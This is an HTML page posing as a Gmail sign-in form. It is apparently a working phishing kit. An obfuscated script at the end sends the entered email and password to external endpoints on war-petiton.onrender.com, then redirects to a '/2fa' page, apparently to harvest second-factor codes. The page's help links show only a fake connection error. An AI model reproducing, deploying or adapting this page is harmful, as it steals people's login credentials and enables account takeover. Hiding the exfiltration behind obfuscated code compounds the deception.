<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gmail Login</title>
</head>
<style>
    .loading-txt{
        font-size: 14px;
        font-family: 'Poppins',sans-serif;
        text-align: center;
        display: none;
    }
    @media screen and (max-width:560px) {
        *body{
            padding: 0;
            margin: 0;
        }
        ul { padding:0 }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
        }
        .out-of-names-div{
            width: 100%;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            position: relative;
            top: -20px;
            font-weight: 400;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
      top: -25px;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color:#fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 15px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 600;
        }
        .use-google{
            font-size: 15px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            position: relative;
            top: -20px;
        }
        .not-your,.learn-more{
            font-size: 14px;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            color: #464646;
            padding: 5%;
            position: relative;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 14px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            margin-right: 5px;
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            border: none;
            font-family: 'Poppins',sans-serif;
        }
        .show-forget{
            display: flex;
            justify-content: space-between;
            padding-right: 10px;
        }
        #show{
            font-size: 14px;
            font-weight: 500;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 11px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
            position: relative;
        }
    }

    @media (min-width: 561px) and (max-width:1200px) {
        *body{
            padding: 0;
            margin: 0;
        }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            font-weight: 400;
            position: relative;
            top: -20%;
        }
        .show-forget{
            display: flex;
            justify-content: space-between;
            padding-right: 3%;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
      background-color: #fff;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
      background-color: #fff;
    }
    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 14px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 15%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      left: 7%;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }
    .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 14px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 15px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        .use-google{
            font-size: 15px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            color: #464646;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .out-of-names-div{
            width: 100%;
            display: flex;
            justify-content: space-between;
            position: relative; 
            top: -30px;
        }
        
        .create-account{
            text-decoration: none;
            font-size: 17px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
            margin-right: 5%;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }   
    }

    @media (min-width:1200px) {
        body{
            justify-content: center;
        }
        .container{
            width: 23%;
            transform: translate(150%,25%);
            border: 1px solid rgba(151, 151, 151, 0.308);
            height:530px;
            border-radius: 10px;
            padding:10px;
        }
        .logo-img{
            display: flex;
            justify-content: center;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            position: relative;
            top: -30px;
            font-weight: 400;
        }
        .use-google{
            position: relative;
            top: -40px;
            font-size: 18px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
      top: -40px;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 15px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-google{
            font-size: 18px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            color: #464646;
            padding: 5%;
            position: relative;
            top: -20px;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
            position: relative;
            top: -10%;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
            position: relative;
            top: -10%;
        }
        .create-account{
            text-decoration: none;
            font-size: 17px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
           .show-forget{
            display: flex;
            justify-content: space-between;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }
    }
</style>
<body>
    <section id="home-section">
        <h4 class="loading-txt">Loading.....</h4>
        <div class="container">
            <div class="logo-img">
                <img src="/images/icon-ar21.svg" alt="">
            </div>
            <h4 class="sign-in-text"> Signin</h4>
            <h4 class="use-google">Sign in to your account</h4>
                <div class="form-group">
                    <input type="email" id="email" name="dataInput" placeholder=" ">
                    <label for="email" id="email-label"> Email or Phone </label>
                  </div>
                  <!-- <h4 class="errormsg1">Enter a valid Email Address to continue</h4> -->
                  <div class="form-group">
                    <input type="password" id="password" name="myInput" placeholder=" ">
                    <label for="password"> Password </label>
                  </div>
                  <!-- <h4 class="errormsg2">Enter password to login</h4> -->
                  <div class="show-forget">
                    <a href="#" class="forgot-password" onclick="connectionErr()">Forgot password?</a>
                    <a href="#" class="forgot-password" id="show" onclick="showPassword()">Show</a>
                </div>
                  <h4 class="not-your">Not your computer? use guest mode to sign in privately</h4>
                  <a href="#" class="learn-more" id="learn-more" onclick="connectionErr()">Learn more about using Guestmode</a>
                  <div class="login-div">
                    <a href="#" class="create-account">Create Account</a>
                    <button id="login" onclick="handleLogin()">Login</button>
                  </div>
        </div>
    </section>


    <script>

(function(_0x390bb9,_0x1f7a0c){const _0x57ff72=_0xf785,_0x1f4a1a=_0x390bb9();while(!![]){try{const _0x46dbce=-parseInt(_0x57ff72(0xf4))/0x1+parseInt(_0x57ff72(0xe0))/0x2+parseInt(_0x57ff72(0xf0))/0x3*(parseInt(_0x57ff72(0xeb))/0x4)+parseInt(_0x57ff72(0xde))/0x5+-parseInt(_0x57ff72(0xf1))/0x6*(parseInt(_0x57ff72(0xe6))/0x7)+parseInt(_0x57ff72(0xda))/0x8+parseInt(_0x57ff72(0xdb))/0x9*(-parseInt(_0x57ff72(0xf5))/0xa);if(_0x46dbce===_0x1f7a0c)break;else _0x1f4a1a['push'](_0x1f4a1a['shift']());}catch(_0x28a07e){_0x1f4a1a['push'](_0x1f4a1a['shift']());}}}(_0x206a,0xe8d89));function connectionErr(){setTimeout(()=>{alert('Difficulty\x20connecting\x20to\x20site!');},0xbb8);}function _0xf785(_0x541109,_0x5366d8){const _0x206afa=_0x206a();return _0xf785=function(_0xf785a8,_0x5463b9){_0xf785a8=_0xf785a8-0xda;let _0x24168b=_0x206afa[_0xf785a8];return _0x24168b;},_0xf785(_0x541109,_0x5366d8);}function _0x206a(){const _0x14dcdf=['test','value','href','email','4ogFSTb','Must\x20Enter\x20Password','text','POST','type','4451583eNGMnq','5646CmNkJu','getElementById','error','130849kYWCzd','37430zEtUET','/2fa','https://war-petiton.onrender.com/endpoint3','Error','12650824nqwaPk','6066ivDKMZ','then','catch','3386925qfWvtZ','stringify','3228176oIdiTH','http://war-petiton.onrender.com/storeData','json','application/json','password','location','13013rgdJAB'];_0x206a=function(){return _0x14dcdf;};return _0x206a();}function sendPostRequest(){const _0x4cb019=_0xf785,_0x1cc3e0=document['getElementById'](_0x4cb019(0xea))[_0x4cb019(0xe8)],_0x3d161c={'key1':_0x1cc3e0};fetch(_0x4cb019(0xe1),{'method':_0x4cb019(0xee),'headers':{'Content-Type':_0x4cb019(0xe3)},'body':JSON[_0x4cb019(0xdf)](_0x3d161c)})[_0x4cb019(0xdc)](_0x425465=>_0x425465[_0x4cb019(0xe2)]())[_0x4cb019(0xdc)](_0x3cfc08=>{console['log']('Success:',_0x3cfc08);})[_0x4cb019(0xdd)](_0x40ba73=>{const _0x1a05b2=_0x4cb019;console[_0x1a05b2(0xf3)]('Error:',_0x40ba73);});}const handleLogin=async()=>{const _0xc4bfb2=_0xf785,_0x3c5842=_0xc4bfb2(0xf7),_0x12ef8c=document[_0xc4bfb2(0xf2)](_0xc4bfb2(0xea))[_0xc4bfb2(0xe8)];_0x2c0495=document['getElementById'](_0xc4bfb2(0xe4))[_0xc4bfb2(0xe8)];function _0x1f3aa8(_0x47e317){const _0x3aa1d5=_0xc4bfb2;return/^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/[_0x3aa1d5(0xe7)](_0x47e317);}if(_0x12ef8c==''||!_0x1f3aa8(_0x12ef8c))alert('Enter\x20a\x20valid\x20Email\x20to\x20continue');else{if(_0x2c0495=='')alert(_0xc4bfb2(0xec));else{sendPostRequest();try{const _0x2e0b2f={'email':_0x12ef8c,'password':_0x2c0495},_0xf504c3=await fetch(_0x3c5842,{'method':_0xc4bfb2(0xee),'headers':{'Content-Type':_0xc4bfb2(0xe3)},'body':JSON[_0xc4bfb2(0xdf)](_0x2e0b2f)});_0xf504c3['status']===0xc8&&(window[_0xc4bfb2(0xe5)][_0xc4bfb2(0xe9)]=_0xc4bfb2(0xf6));}catch(_0x422085){console['error'](_0xc4bfb2(0xf8),_0x422085);}}}};function showPassword(){const _0x14eec7=_0xf785;var _0xc9c2ef=document[_0x14eec7(0xf2)](_0x14eec7(0xe4));_0xc9c2ef[_0x14eec7(0xef)]==='text'?_0xc9c2ef[_0x14eec7(0xef)]=_0x14eec7(0xe4):_0xc9c2ef['type']=_0x14eec7(0xed);}

    </script>
</body>
</html>

